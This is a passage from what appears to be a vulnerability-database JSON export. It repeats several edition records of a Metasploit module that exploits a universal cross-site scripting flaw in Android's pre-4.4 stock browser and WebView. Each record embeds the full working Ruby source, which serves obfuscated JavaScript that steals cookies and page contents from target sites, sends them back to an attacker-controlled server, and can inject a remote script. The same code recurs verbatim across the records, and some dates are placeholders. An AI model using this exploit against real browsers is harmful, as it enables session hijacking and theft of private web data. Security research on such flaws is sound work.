[ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-23T12:36:53", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-23T14:38:22", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-23T14:38:22", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-24T02:53:34", "history": [], "viewCount": 55, "enchantments": {"score": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-24T02:53:34", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-24T08:49:18", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-24T08:49:18", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-26T22:46:02", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-26T22:46:02", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-04-27T00:43:53", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-04-27T00:43:53", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-10T17:05:42", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires 